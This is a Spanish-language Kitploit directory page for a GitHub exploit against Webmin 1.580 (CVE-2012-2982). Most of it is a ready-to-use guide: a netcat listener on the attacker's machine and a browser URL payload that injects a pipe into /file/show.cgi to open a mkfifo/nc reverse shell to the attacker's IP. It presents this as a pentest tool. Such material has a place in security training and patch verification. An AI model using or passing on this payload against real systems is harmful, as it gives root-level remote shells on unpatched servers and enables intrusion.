Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Webmin-1.580---file-show.cgi-Manual-Remote-Command-Execution-Non-Metasploit- — Exploit manual de ejecución remota de código (RCE) autenticado, no Metasploit, a través de la barra de URL del navegador para Webmin 1.580 (CVE-2012-2982) | Kitploit
Herramientas/GitHubGitHub/marinovharisan/webmin-1.580---file-show.cgi-manual-remote-command-execution-non-metasploit-
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubmarinovharisan/webmin-1.580---file-show.cgi-manual-remote-command-execution-non-metasploit-

Webmin-1.580---file-show.cgi-Manual-Remote-Command-Execution-Non-Metasploit-

Exploit manual de ejecución remota de código (RCE) autenticado, no Metasploit, a través de la barra de URL del navegador para Webmin 1.580 (CVE-2012-2982)

Ver Repositorio
2hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Guía de Ejecución de RCE en Webmin 1.580

Referencia rápida para ejecutar Ejecución Remota de Código (RCE) autenticada en Webmin 1.580 a través del componente /file/show.cgi.


1. Máquina Atacante (Receptor)

Ejecuta este comando en tu máquina local para capturar la conexión entrante antes de ejecutar el payload:

root@kitploit:~
rlwrap nc -lnvp 4444
  1. Payload de Explotación del Objetivo Pega la siguiente URL directamente en la barra de direcciones de tu navegador (asegúrate de haber iniciado sesión primero en el panel de Webmin):
root@kitploit:~
http://127.0.0.1:10001/file/show.cgi/bin/sysinfo.cgi|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_ATTACK_IP> 4444 >/tmp/f|
Captura de pantalla 2026-05-25 220641

Nota: Recuerda reemplazar <YOUR_ATTACK_IP> con tu dirección IP local o de túnel real, TAMBIÉN la IP y PUERTO del objetivo. Captura de pantalla 2026-05-25 220708

Contexto y Detalles Vulnerabilidad: Saneamiento insuficiente de la información de ruta en línea pasada a la función open() interna de Perl en /file/show.cgi. Agregar el carácter de tubería (|) permite la ejecución arbitraria de comandos con privilegios de root.

Autenticación: Esto requiere una sesión activa. El navegador maneja automáticamente la autenticación enviando las cookies de tu sesión activa cuando envías el payload de la URL.

Comportamiento esperado: Después de presionar Enter, la pestaña del navegador se pondrá a cargar y parecerá colgarse indefinidamente. Esto confirma que el hilo del servidor ha sido secuestrado exitosamente para mantener la sesión interactiva de shell.

Descargar herramienta